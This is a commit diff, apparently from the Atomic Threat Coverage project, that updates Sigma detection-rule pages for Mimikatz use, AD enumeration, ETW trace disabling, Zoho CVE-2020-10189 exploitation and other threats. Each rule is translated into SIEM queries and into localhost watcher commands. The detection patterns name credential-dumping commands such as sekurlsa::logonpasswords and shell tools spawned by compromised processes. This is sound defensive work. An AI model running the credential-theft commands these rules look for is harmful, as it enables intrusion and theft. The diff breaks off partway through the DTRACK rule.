curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/ab6bffca-beff-4baa-af11-6733f296d57a <<EOF\n{\n "metadata": {\n "title": "AD User Enumeration",\n "description": "Detects access to a domain user from a non-machine account",\n "tags": [\n "attack.discovery",\n "attack.t1087"\n ],\n "query": "((EventID:\\"4662\\" AND ObjectType.keyword:(*bf967aba\\\\-0de6\\\\-11d0\\\\-a285\\\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((EventID:\\"4662\\" AND ObjectType.keyword:(*bf967aba\\\\-0de6\\\\-11d0\\\\-a285\\\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'AD User Enumeration\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
((EventID:"4662" AND ObjectType.keyword:(*bf967aba\\-0de6\\-11d0\\-a285\\-00aa003049e2*)) AND (NOT (SubjectUserName.keyword:*$ OR SubjectUserName.keyword:MSOL_*)))
```
### splunk
```
((EventID="4662" (ObjectType="*bf967aba-0de6-11d0-a285-00aa003049e2*")) NOT (SubjectUserName="*$" OR SubjectUserName="MSOL_*"))
```
### logpoint
```
(event_source="Microsoft-Windows-Security-Auditing" (event_id="4662" ObjectType IN ["*bf967aba-0de6-11d0-a285-00aa003049e2*"]) -(SubjectUserName="*$" OR SubjectUserName="MSOL_*"))
```
### grep
```
grep -P '^(?:.*(?=.*(?:.*(?=.*4662)(?=.*(?:.*.*bf967aba-0de6-11d0-a285-00aa003049e2.*))))(?=.*(?!.*(?:.*(?:.*(?=.*.*\\$)|.*(?=.*MSOL_.*))))))'
```

6
Atomic_Threat_Coverage/Detection_Rules/win_alert_mimikatz_keywords.md
View File

@ -61,21 +61,21 @@ level: critical
### es-qs
```
Message.keyword:(*\\ mimikatz\\ * OR *\\ mimilib\\ * OR *\\ 3\\ eo.oe\\ * OR *\\ eo.oe.kiwi\\ * OR *\\ privilege\\:\\:debug\\ * OR *\\ sekurlsa\\:\\:logonpasswords\\ * OR *\\ lsadump\\:\\:sam\\ * OR *\\ mimidrv.sys\\ * OR *\\ p\\:\\:d\\ * OR *\\ s\\:\\:l\\ *)
Message.keyword:(*\\ mimikatz\\ * OR *\\ mimilib\\ * OR *\\ <3\\ eo.oe\\ * OR *\\ eo.oe.kiwi\\ * OR *\\ privilege\\:\\:debug\\ * OR *\\ sekurlsa\\:\\:logonpasswords\\ * OR *\\ lsadump\\:\\:sam\\ * OR *\\ mimidrv.sys\\ * OR *\\ p\\:\\:d\\ * OR *\\ s\\:\\:l\\ *)
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/06d71506-7beb-4f22-8888-e2e5e2ca7fd8 <<EOF\n{\n "metadata": {\n "title": "Mimikatz Use",\n "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)",\n "tags": [\n "attack.s0002",\n "attack.t1003",\n "attack.lateral_movement",\n "attack.credential_access",\n "car.2013-07-001",\n "car.2019-04-004"\n ],\n "query": "Message.keyword:(*\\\\ mimikatz\\\\ * OR *\\\\ mimilib\\\\ * OR *\\\\ 3\\\\ eo.oe\\\\ * OR *\\\\ eo.oe.kiwi\\\\ * OR *\\\\ privilege\\\\:\\\\:debug\\\\ * OR *\\\\ sekurlsa\\\\:\\\\:logonpasswords\\\\ * OR *\\\\ lsadump\\\\:\\\\:sam\\\\ * OR *\\\\ mimidrv.sys\\\\ * OR *\\\\ p\\\\:\\\\:d\\\\ * OR *\\\\ s\\\\:\\\\:l\\\\ *)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "Message.keyword:(*\\\\ mimikatz\\\\ * OR *\\\\ mimilib\\\\ * OR *\\\\ 3\\\\ eo.oe\\\\ * OR *\\\\ eo.oe.kiwi\\\\ * OR *\\\\ privilege\\\\:\\\\:debug\\\\ * OR *\\\\ sekurlsa\\\\:\\\\:logonpasswords\\\\ * OR *\\\\ lsadump\\\\:\\\\:sam\\\\ * OR *\\\\ mimidrv.sys\\\\ * OR *\\\\ p\\\\:\\\\:d\\\\ * OR *\\\\ s\\\\:\\\\:l\\\\ *)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Mimikatz Use\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/06d71506-7beb-4f22-8888-e2e5e2ca7fd8 <<EOF\n{\n "metadata": {\n "title": "Mimikatz Use",\n "description": "This method detects mimikatz keywords in different Eventlogs (some of them only appear in older Mimikatz version that are however still used by different threat groups)",\n "tags": [\n "attack.s0002",\n "attack.t1003",\n "attack.lateral_movement",\n "attack.credential_access",\n "car.2013-07-001",\n "car.2019-04-004"\n ],\n "query": "Message.keyword:(*\\\\ mimikatz\\\\ * OR *\\\\ mimilib\\\\ * OR *\\\\ <3\\\\ eo.oe\\\\ * OR *\\\\ eo.oe.kiwi\\\\ * OR *\\\\ privilege\\\\:\\\\:debug\\\\ * OR *\\\\ sekurlsa\\\\:\\\\:logonpasswords\\\\ * OR *\\\\ lsadump\\\\:\\\\:sam\\\\ * OR *\\\\ mimidrv.sys\\\\ * OR *\\\\ p\\\\:\\\\:d\\\\ * OR *\\\\ s\\\\:\\\\:l\\\\ *)"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "Message.keyword:(*\\\\ mimikatz\\\\ * OR *\\\\ mimilib\\\\ * OR *\\\\ <3\\\\ eo.oe\\\\ * OR *\\\\ eo.oe.kiwi\\\\ * OR *\\\\ privilege\\\\:\\\\:debug\\\\ * OR *\\\\ sekurlsa\\\\:\\\\:logonpasswords\\\\ * OR *\\\\ lsadump\\\\:\\\\:sam\\\\ * OR *\\\\ mimidrv.sys\\\\ * OR *\\\\ p\\\\:\\\\:d\\\\ * OR *\\\\ s\\\\:\\\\:l\\\\ *)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Mimikatz Use\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
Message.keyword:(* mimikatz * * mimilib * * 3 eo.oe * * eo.oe.kiwi * * privilege\\:\\:debug * * sekurlsa\\:\\:logonpasswords * * lsadump\\:\\:sam * * mimidrv.sys * * p\\:\\:d * * s\\:\\:l *)
Message.keyword:(* mimikatz * * mimilib * * <3 eo.oe * * eo.oe.kiwi * * privilege\\:\\:debug * * sekurlsa\\:\\:logonpasswords * * lsadump\\:\\:sam * * mimidrv.sys * * p\\:\\:d * * s\\:\\:l *)
```

6
Atomic_Threat_Coverage/Detection_Rules/win_apt_bear_activity_gtr19.md
View File

@ -1,4 +1,4 @@
| Title | Judgement Panda Exfil Activity |
| Title | Judgement Panda Credential Access Activity |
|:-------------------------|:------------------|
| **Description** | Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike |
| **ATT&amp;CK Tactic** | <ul><li>[TA0006: Credential Access](https://attack.mitre.org/tactics/TA0006)</li></ul> |
@ -17,7 +17,7 @@
### Sigma rule
```
title: Judgement Panda Exfil Activity
title: Judgement Panda Credential Access Activity
id: b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee
description: Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike
references:
@ -59,7 +59,7 @@ level: critical
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee <<EOF\n{\n "metadata": {\n "title": "Judgement Panda Exfil Activity",\n "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike",\n "tags": [\n "attack.credential_access",\n "attack.t1081",\n "attack.t1003"\n ],\n "query": "((Image.keyword:*\\\\\\\\xcopy.exe AND CommandLine.keyword:*\\\\ \\\\/S\\\\ \\\\/E\\\\ \\\\/C\\\\ \\\\/Q\\\\ \\\\/H\\\\ \\\\\\\\*) OR (Image.keyword:*\\\\\\\\adexplorer.exe AND CommandLine.keyword:*\\\\ \\\\-snapshot\\\\ \\\\\\"\\\\\\"\\\\ c\\\\:\\\\\\\\users\\\\\\\\*))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((Image.keyword:*\\\\\\\\xcopy.exe AND CommandLine.keyword:*\\\\ \\\\/S\\\\ \\\\/E\\\\ \\\\/C\\\\ \\\\/Q\\\\ \\\\/H\\\\ \\\\\\\\*) OR (Image.keyword:*\\\\\\\\adexplorer.exe AND CommandLine.keyword:*\\\\ \\\\-snapshot\\\\ \\\\\\"\\\\\\"\\\\ c\\\\:\\\\\\\\users\\\\\\\\*))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Judgement Panda Exfil Activity\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b83f5166-9237-4b5e-9cd4-7b5d52f4d8ee <<EOF\n{\n "metadata": {\n "title": "Judgement Panda Credential Access Activity",\n "description": "Detects Russian group activity as described in Global Threat Report 2019 by Crowdstrike",\n "tags": [\n "attack.credential_access",\n "attack.t1081",\n "attack.t1003"\n ],\n "query": "((Image.keyword:*\\\\\\\\xcopy.exe AND CommandLine.keyword:*\\\\ \\\\/S\\\\ \\\\/E\\\\ \\\\/C\\\\ \\\\/Q\\\\ \\\\/H\\\\ \\\\\\\\*) OR (Image.keyword:*\\\\\\\\adexplorer.exe AND CommandLine.keyword:*\\\\ \\\\-snapshot\\\\ \\\\\\"\\\\\\"\\\\ c\\\\:\\\\\\\\users\\\\\\\\*))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "((Image.keyword:*\\\\\\\\xcopy.exe AND CommandLine.keyword:*\\\\ \\\\/S\\\\ \\\\/E\\\\ \\\\/C\\\\ \\\\/Q\\\\ \\\\/H\\\\ \\\\\\\\*) OR (Image.keyword:*\\\\\\\\adexplorer.exe AND CommandLine.keyword:*\\\\ \\\\-snapshot\\\\ \\\\\\"\\\\\\"\\\\ c\\\\:\\\\\\\\users\\\\\\\\*))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Judgement Panda Credential Access Activity\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```

7
Atomic_Threat_Coverage/Detection_Rules/win_etw_trace_evasion.md
View File

@ -6,8 +6,8 @@
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1070: Indicator Removal on Host](../Triggers/T1070.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | There are no documented False Positives for this Detection Rule yet |
| **Development Status** | Development Status wasn't defined for this Detection Rule yet |
| **False Positives** | <ul><li>Unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil)</li><li>[https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml](https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml)</li><li>[https://abuse.io/lockergoga.txt](https://abuse.io/lockergoga.txt)</li></ul> |
| **Author** | @neu5ron, Florian Roth |
| Other Tags | <ul><li>car.2016-04-002</li></ul> |
@ -20,6 +20,7 @@
title: Disable of ETW Trace
id: a238b5d0-ce2d-4414-a676-7a531b3d13d6
description: Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.
status: experimental
references:
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil
- https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_mal_lockergoga.yml
@ -44,6 +45,8 @@ detection:
selection_disable_2:
CommandLine: '* set-log* /e:false*'
condition: selection_clear_1 or selection_clear_2 or selection_disable_1 or selection_disable_2
falsepositives:
- Unknown
```

97
Atomic_Threat_Coverage/Detection_Rules/win_exploit_cve_2020_10189.md Normal file
View File

@ -0,0 +1,97 @@
| Title | Exploited CVE-2020-10189 Zoho ManageEngine |
|:-------------------------|:------------------|
| **Description** | Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189 |
| **ATT&amp;CK Tactic** | <ul><li>[TA0001: Initial Access](https://attack.mitre.org/tactics/TA0001)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1190: Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)</li></ul> |
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1190: Exploit Public-Facing Application](../Triggers/T1190.md)</li></ul> |
| **Severity Level** | critical |
| **False Positives** | <ul><li>Unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html)</li><li>[https://nvd.nist.gov/vuln/detail/CVE-2020-10189](https://nvd.nist.gov/vuln/detail/CVE-2020-10189)</li><li>[https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189)</li><li>[https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224](https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224)</li></ul> |
| **Author** | Florian Roth |
## Detection Rules
### Sigma rule
```
title: Exploited CVE-2020-10189 Zoho ManageEngine
id: 846b866e-2a57-46ee-8e16-85fa92759be7
status: experimental
description: Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189
references:
- https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-10189
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10189
- https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224
author: Florian Roth
date: 2020/03/25
tags:
- attack.initial_access
- attack.t1190
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage|endswith: 'DesktopCentral_Server\jre\bin\java.exe'
Image|endswith:
- '*\cmd.exe'
- '*\powershell.exe'
- '*\bitsadmin.exe'
condition: selection
falsepositives:
- Unknown
level: critical
```
### es-qs
```
(ParentImage.keyword:*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe AND Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\bitsadmin.exe))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/846b866e-2a57-46ee-8e16-85fa92759be7 <<EOF\n{\n "metadata": {\n "title": "Exploited CVE-2020-10189 Zoho ManageEngine",\n "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189",\n "tags": [\n "attack.initial_access",\n "attack.t1190"\n ],\n "query": "(ParentImage.keyword:*DesktopCentral_Server\\\\\\\\jre\\\\\\\\bin\\\\\\\\java.exe AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\bitsadmin.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentImage.keyword:*DesktopCentral_Server\\\\\\\\jre\\\\\\\\bin\\\\\\\\java.exe AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\bitsadmin.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Exploited CVE-2020-10189 Zoho ManageEngine\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}{{_source}}\\n================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(ParentImage.keyword:*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe AND Image.keyword:(*\\\\cmd.exe *\\\\powershell.exe *\\\\bitsadmin.exe))
```
### splunk
```
(ParentImage="*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe" (Image="*\\\\cmd.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\bitsadmin.exe"))
```
### logpoint
```
(event_id="1" ParentImage="*DesktopCentral_Server\\\\jre\\\\bin\\\\java.exe" Image IN ["*\\\\cmd.exe", "*\\\\powershell.exe", "*\\\\bitsadmin.exe"])
```
### grep
```
grep -P '^(?:.*(?=.*.*DesktopCentral_Server\\jre\\bin\\java\\.exe)(?=.*(?:.*.*\\cmd\\.exe|.*.*\\powershell\\.exe|.*.*\\bitsadmin\\.exe)))'
```

103
Atomic_Threat_Coverage/Detection_Rules/win_html_help_spawn.md Normal file
View File

@ -0,0 +1,103 @@
| Title | HTML Help Shell Spawn |
|:-------------------------|:------------------|
| **Description** | Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm) |
| **ATT&amp;CK Tactic** | <ul><li>[TA0002: Execution](https://attack.mitre.org/tactics/TA0002)</li><li>[TA0005: Defense Evasion](https://attack.mitre.org/tactics/TA0005)</li></ul> |
| **ATT&amp;CK Technique** | <ul><li>[T1223: Compiled HTML File](https://attack.mitre.org/techniques/T1223)</li></ul> |
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1223: Compiled HTML File](../Triggers/T1223.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | <ul><li>unknown</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/)</li></ul> |
| **Author** | Maxim Pavlunin |
## Detection Rules
### Sigma rule
```
title: HTML Help Shell Spawn
id: 52cad028-0ff0-4854-8f67-d25dfcbc78b4
status: experimental
description: Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)
references:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/
author: Maxim Pavlunin
date: 2020/04/01
modified: 2020/04/03
tags:
- attack.execution
- attack.defense_evasion
- attack.t1223
logsource:
category: process_creation
product: windows
detection:
selection:
ParentImage: 'C:\Windows\hh.exe'
Image|endswith:
- '\cmd.exe'
- '\powershell.exe'
- '\wscript.exe'
- '\cscript.exe'
- '\regsvr32.exe'
- '\wmic.exe'
- '\rundll32.exe'
condition: selection
fields:
- CommandLine
- ParentCommandLine
falsepositives:
- unknown
level: high
```
### es-qs
```
(ParentImage:"C\\:\\\\Windows\\\\hh.exe" AND Image.keyword:(*\\\\cmd.exe OR *\\\\powershell.exe OR *\\\\wscript.exe OR *\\\\cscript.exe OR *\\\\regsvr32.exe OR *\\\\wmic.exe OR *\\\\rundll32.exe))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/52cad028-0ff0-4854-8f67-d25dfcbc78b4 <<EOF\n{\n "metadata": {\n "title": "HTML Help Shell Spawn",\n "description": "Detects a suspicious child process of a Microsoft HTML Help system when executing compiled HTML files (.chm)",\n "tags": [\n "attack.execution",\n "attack.defense_evasion",\n "attack.t1223"\n ],\n "query": "(ParentImage:\\"C\\\\:\\\\\\\\Windows\\\\\\\\hh.exe\\" AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\wscript.exe OR *\\\\\\\\cscript.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\wmic.exe OR *\\\\\\\\rundll32.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentImage:\\"C\\\\:\\\\\\\\Windows\\\\\\\\hh.exe\\" AND Image.keyword:(*\\\\\\\\cmd.exe OR *\\\\\\\\powershell.exe OR *\\\\\\\\wscript.exe OR *\\\\\\\\cscript.exe OR *\\\\\\\\regsvr32.exe OR *\\\\\\\\wmic.exe OR *\\\\\\\\rundll32.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'HTML Help Shell Spawn\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(ParentImage:"C\\:\\\\Windows\\\\hh.exe" AND Image.keyword:(*\\\\cmd.exe *\\\\powershell.exe *\\\\wscript.exe *\\\\cscript.exe *\\\\regsvr32.exe *\\\\wmic.exe *\\\\rundll32.exe))
```
### splunk
```
(ParentImage="C:\\\\Windows\\\\hh.exe" (Image="*\\\\cmd.exe" OR Image="*\\\\powershell.exe" OR Image="*\\\\wscript.exe" OR Image="*\\\\cscript.exe" OR Image="*\\\\regsvr32.exe" OR Image="*\\\\wmic.exe" OR Image="*\\\\rundll32.exe")) | table CommandLine,ParentCommandLine
```
### logpoint
```
(event_id="1" ParentImage="C:\\\\Windows\\\\hh.exe" Image IN ["*\\\\cmd.exe", "*\\\\powershell.exe", "*\\\\wscript.exe", "*\\\\cscript.exe", "*\\\\regsvr32.exe", "*\\\\wmic.exe", "*\\\\rundll32.exe"])
```
### grep
```
grep -P '^(?:.*(?=.*C:\\Windows\\hh\\.exe)(?=.*(?:.*.*\\cmd\\.exe|.*.*\\powershell\\.exe|.*.*\\wscript\\.exe|.*.*\\cscript\\.exe|.*.*\\regsvr32\\.exe|.*.*\\wmic\\.exe|.*.*\\rundll32\\.exe)))'
```

6
Atomic_Threat_Coverage/Detection_Rules/win_malware_dtrack.md
View File

@ -50,21 +50,21 @@ level: critical
### es-qs
```
CommandLine.keyword:*\\ echo\\ EEEE\\ \\ *
CommandLine.keyword:*\\ echo\\ EEEE\\ >\\ *
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/f1531fa4-5b84-4342-8f68-9cf3fdbd83d4 <<EOF\n{\n "metadata": {\n "title": "DTRACK Process Creation",\n "description": "Detects specific process parameters as seen in DTRACK infections",\n "tags": "",\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ \\\\ *"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ \\\\ *",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DTRACK Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/f1531fa4-5b84-4342-8f68-9cf3fdbd83d4 <<EOF\n{\n "metadata": {\n "title": "DTRACK Process Creation",\n "description": "Detects specific process parameters as seen in DTRACK infections",\n "tags": "",\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ >\\\\ *"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:*\\\\ echo\\\\ EEEE\\\\ >\\\\ *",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'DTRACK Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = 